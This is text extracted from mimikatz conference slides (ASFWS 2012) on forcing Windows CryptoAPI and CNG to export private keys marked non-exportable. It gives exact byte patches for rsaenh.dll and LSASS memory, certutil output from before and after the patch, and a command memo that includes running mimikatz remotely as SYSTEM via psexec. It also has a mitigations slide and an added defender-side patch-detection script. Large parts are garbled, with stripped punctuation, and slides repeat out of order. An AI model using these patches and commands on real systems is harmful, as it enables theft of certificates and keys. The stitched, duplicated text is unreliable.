07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz cryptohow itrsquos protected
Private keys are DPAPI protectedndash You cannot reuse private key files on another computer
bull At least without the master keys andor password of users
ComputerUser can load their own keys because they have enough secrets to do it (ex session opened)ndash Yes a computerserver open a ldquosessionrdquo
ExportUsage can be limited by ndash Password
ndash Popup
ndash ExportArchive flag no present
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 39
Constraint for most userUnavailable for computer keys
certutil -importpfx mycertp12 NoExportcertutil -csp Microsoft Enhanced Cryptographic Provider v10 -importpfx mycertp12 NoExport
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
mimikatz cryptoexportCertificatesEmplacement CERT_SYSTEM_STORE_CURRENT_USERMy
- Benjamin DelpyContainer Cleacute 470ADFBA-8718-4014-B05E-B30776B75A03Provider Microsoft Enhanced Cryptographic Provider v10Type AT_KEYEXCHANGEExportabiliteacute NONTaille cleacute 2048Export priveacute dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpypfx KO
(0x8009000b) Cleacute non valide pour lutilisation dans leacutetat speacutecifieacuteExport public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpyder OK
================ Certificat 0 ================Numeacutero de seacuterie 112169417a1c3ef46a301f99385f50680fa0Eacutemetteur CN=GlobalSign CodeSigning CA - G2 O=GlobalSign nv-sa C=BEObjet CN=Benjamin Delpy C=FRIl ne sagit pas dun certificat racineHach cert (sha1) ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
Conteneur de cleacute = 470ADFBA-8718-4014-B05E-B30776B75A03Fournisseur = Microsoft Enhanced Cryptographic Provider v10
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de cryptageCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
Exportable
mimikatz crypto patchcapibecause I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapidemo time
Import export import as not exportablehellip export
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44
mimikatz crypto patchcapilimitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life usebull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45
mimikatz crypto cnghow it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquondash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellipndash It is but itrsquos not perfecthellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46
mimikatz crypto cnghow itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEMSYSTEM_MANDATORY_LABEL_NO_WRITE_UPSYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcngbecause sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48
mimikatz cryptoexportKeys[user] Cleacutes CNG
- cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Exportabiliteacute NONTaille cleacute 2048Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO
mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcngbecause sometimes I own LSASS
This time checks and keys are in LSASS processhellipAnd what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcngdemo time
Import export import as not exportablehellip export again
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50
mimikatz crypto patchcnglimitations
Patch operation needs some privilegesndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu )ndash certutil canhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51
mimikatz crypto patchcngbonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
La cleacute priveacutee NE PEUT PAS ecirctre exporteacuteeSuccegraves du test de chiffrementCertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813)CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfxMY================ Certificat 1 ================[hellip]Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318Fournisseur = Microsoft Software Key Storage Provider
Succegraves du test de chiffrementCertUtil -exportPFX La commande sest termineacutee correctement
mimikatz cryptomemo
Some commands mimikatz cryptopatchcapi cryptoexportCertificates exit
psexec windows -s -c cmimikatzWin32mimikatzexe cryptopatchcapi cryptopatchcng
cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE cryptoexportKeys computer exit
mimikatz cryptoexportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilegedebug cryptopatchcng cryptopatchcapi cryptoexportCertificates
cryptoexportKeys exit
Password ndash PFX files are protected by this password mimikatz
Keysndash When you import multiple time a certificate exportable or not Windows make duplicate keys
ndash When you delete a certificate Windows does not delete its private keyhellip funny isnrsquot it bull So yes mimikatz can export it
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 53
mimikatz cryptowhat we can do
Exactly the same as for sekurlsa it will prevent access to accounts computer ndash no admin no admin no adminhellip
Basicsndash Use smartcardstoken for users certificates
ndash Use Hardware Security Modules (HSM) even SoftHSM
More in depthndash See what Microsoft can do with TPM from Windows 8
bull Virtual SmartCard seems promising
ndash Verify vendors implementation (Lenovo Dell hellip) of TPM CSPKSPbull Their biometrics stuff was a little buggy )
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 54
mimikatzwhat else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker SRP bypass
Driverndash Play with tokens amp privileges
ndash Display SSDT x86 amp x64
ndash List minifilters actions
ndash List Notifications (process thread image registry)
ndash List Objects hooks and procedures
ndash hellip
hellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 55
mimikatzthatrsquos all folks
Thanksrsquo to Merci agrave
ndash my girlfriend for her support (her LSASS crashed few times)
ndash Application Security Forum to offer me this great opportunitybull Partners and Sponsors for sure
ndash Microsoft to always consider it as normalacceptable
ndash Security friendscommunity for their ideas amp challengesbull nagual newsoft mubix hellip
ndash You for your attention
Questions
Donrsquot be shy )
especially if you have written the corresponding slide number
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 56
Blog Source Code amp Contact
blog httpbloggentilkiwicommimikatz httpbloggentilkiwicommimikatzsource httpscodegooglecompmimikatzemail benjamingentilkiwicom
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 57
mimikatz crypto capihow it works
ldquoMicrosoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules CSPs perform all cryptographic operations and manage private keys CSPs can be implemented in software as well as in hardwarerdquondash httptechnetmicrosoftcomlibrarycc962093aspx
Processes (mimikatz IIS Active Directory Internet Explorer yourappsherehellip) load some DLL to deal with different cryptographic stuff CSP (keys) smartcard reader hellipndash cryptdlldll rsaenhdll hellip
Process deal with cryptographic keys by this APIhellip
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 40
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz :: crypto :: patchcapi - because I own my process (slide 42)
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable:
mimikatz # crypto::exportCertificates
Emplacement : CERT_SYSTEM_STORE_CURRENT_USER\My
 - Benjamin Delpy
   Container Clé : 470ADFBA-8718-4014-B05E-B30776B75A03
   Provider : Microsoft Enhanced Cryptographic Provider v1.0
   Type : AT_KEYEXCHANGE
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
   Export public dans CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der : OK
================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
(slide callout: Exportable -> Exportabilité : NON)
mimikatz :: crypto :: patchcapi - because I own my process (slide 43)
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space (two sites, original instruction then its patched form):
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive
.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi - demo time (slide 44)
Import, export, import as not exportable… export!
mimikatz :: crypto :: patchcapi - limitations (slide 45)
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works (slide 46)
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
Processes use RPC to call "Key Isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng - how it's exported ( level) (slide 47)
[Diagram: the process asks CNG to export a key; the request goes over RPC to the KeyIso service in the LSASS process (NT6 System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP), which loads the private key (DPAPI decode, PLAYSKOOL) and checks whether it is exportable: yes -> Exported Key, no -> NTE_NOT_SUPPORTED]
mimikatz :: crypto :: patchcng - because sometimes I own LSASS (slide 48)
When we want to export a certificate with its private key (or only the key), the RPC calls lead to ncrypt!SPCryptExportKey inside lsass (keyiso).
This function does all the work to prepare the export and checks whether the key is exportable:
mimikatz # crypto::exportKeys
[user] Clés CNG
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk : KO
   mod_cryptong::getPrivateKey ; PrivateKeyBlobToPVK : (0x80090029) L'opération demandée n'est pas prise en charge.
(slide callout: Exportable -> Exportabilité : NON)
mimikatz :: crypto :: patchcng - because sometimes I own LSASS (slide 49)
This time the checks and the keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space… (original instruction, then its patched form):
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
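Both rewrites above (0F 85 rel32 to 90 E9 rel32 in the CAPI case, 75 rel8 to EB rel8 in the CNG case) force a conditional branch without changing the instruction length, which is exactly what a memory-integrity check can look for. As an added defender-side example that is not mimikatz code and not from this deck, the Python below diffs the code bytes of a module as loaded in a process against the same bytes from the file on disk and classifies each changed site; the base address and both byte images are constructed for the demonstration, and a real check would read the live .text section (for example with ReadProcessMemory) and the on-disk copy with relocations applied.

```python
"""In-memory patch detector (added example, not mimikatz code).

Compares the bytes of a code region as loaded in a process with the same
region from the module file on disk, and classifies each differing site.
The two branch rewrites described on the slides (0F 85 rel32 -> 90 E9 rel32
and 75 rel8 -> EB rel8) keep the instruction length, so a plain byte diff
plus a little opcode knowledge is enough to name them.
"""
from dataclasses import dataclass

# x86 opcode facts used for classification
JMP_REL32 = 0xE9   # E9 rel32 : jmp (5 bytes)
JMP_REL8 = 0xEB    # EB rel8  : jmp short (2 bytes)
NOP = 0x90


@dataclass
class PatchSite:
    address: int
    original: bytes
    patched: bytes
    kind: str


def is_jcc_rel32(b: bytes) -> bool:
    """0F 80..8F rel32: conditional jump, 6 bytes."""
    return len(b) >= 2 and b[0] == 0x0F and 0x80 <= b[1] <= 0x8F


def is_jcc_rel8(b: bytes) -> bool:
    """70..7F rel8: short conditional jump, 2 bytes."""
    return len(b) >= 1 and 0x70 <= b[0] <= 0x7F


def classify(original: bytes, patched: bytes) -> str:
    """Name the rewrite at a differing site if it is one of the known forms."""
    # 0F 8x rel32 -> 90 E9 rel32: 6-byte jcc replaced by nop + 5-byte jmp,
    # same target displacement, condition no longer evaluated.
    if (len(original) == 6 and is_jcc_rel32(original)
            and patched[:2] == bytes([NOP, JMP_REL32])
            and patched[2:] == original[2:]):
        return "jcc rel32 -> nop; jmp rel32 (branch forced)"
    # 7x rel8 -> EB rel8: 2-byte short jcc replaced by short jmp.
    if (len(original) == 2 and is_jcc_rel8(original)
            and patched[0] == JMP_REL8 and patched[1] == original[1]):
        return "jcc rel8 -> jmp rel8 (branch forced)"
    return "unknown modification"


def find_patches(base: int, disk: bytes, memory: bytes) -> list[PatchSite]:
    """Diff two images of the same region; return every changed site."""
    if len(disk) != len(memory):
        raise ValueError("both images must cover the same region")
    sites: list[PatchSite] = []
    i = 0
    while i < len(disk):
        if disk[i] == memory[i]:
            i += 1
            continue
        # Size the window from the ORIGINAL instruction at this offset, so a
        # 6-byte jcc is reported as one site even if only 2 bytes changed.
        if is_jcc_rel32(disk[i:i + 2]):
            n = 6
        elif is_jcc_rel8(disk[i:i + 1]):
            n = 2
        else:
            n = 1
            while i + n < len(disk) and disk[i + n] != memory[i + n]:
                n += 1
        orig, new = disk[i:i + n], memory[i:i + n]
        sites.append(PatchSite(base + i, orig, new, classify(orig, new)))
        i += n
    return sites


def forced_branches(sites: list[PatchSite]) -> list[int]:
    """Addresses of sites where a conditional branch was made unconditional."""
    return [s.address for s in sites if "branch forced" in s.kind]


# --- constructed sample (not a real rsaenh.dll dump) ------------------------
# Region laid out so that the jnz rel32 sits at 0x0AC0B7CB, the address
# quoted on the slide; the surrounding bytes are filler instructions.
BASE = 0x0AC0B7C6
DISK = bytes.fromhex(
    "8b45fc85c0"      # mov eax,[ebp-4] ; test eax,eax
    "0f8533c7ffff"    # jnz rel32  (the export check)
    "33c0"            # xor eax,eax
    "751c"            # jnz short  (a second check, rel8 form)
    "c3"              # ret
)
# Same region as it would look with both branches forced.
MEMORY = bytes.fromhex("8b45fc85c0" "90e933c7ffff" "33c0" "eb1c" "c3")


def main() -> None:
    sites = find_patches(BASE, DISK, MEMORY)
    for s in sites:
        print(f"{s.address:08X}  {s.original.hex()} -> {s.patched.hex()}  {s.kind}")
    print("forced branches:", [hex(a) for a in forced_branches(sites)])


if __name__ == "__main__":
    main()
```

Relocations and legitimate hooks also show up as differences, so compare after applying the relocation table to the disk copy and alert on forced branches in the export path rather than on any difference.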
mimikatz :: crypto :: patchcng - demo time (slide 50)
Import, export, import as not exportable… export again!
mimikatz :: crypto :: patchcng - limitations (slide 51)
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
mimikatz :: crypto :: patchcng - bonus (slide 52)
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto :: memo (slide 53)
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto :: what we can do (slide 54)
Exactly the same as for sekurlsa: it will prevent access to accounts/computer
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz :: what else can it do? (slide 55)
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
mimikatz :: that's all folks (slide 56)
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact (slide 57)
blog: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz crypto capihow itrsquos exported ( level)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 41
Process
CryptoAPI and RSA CSP
Exportable
Load Private Key
Exported Key
yes
NTE_BAD_KEY_STATE
no
DPAPI Decode
PLAYSKOOL
Ask to export Key
mimikatz crypto patchcapibecause I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42
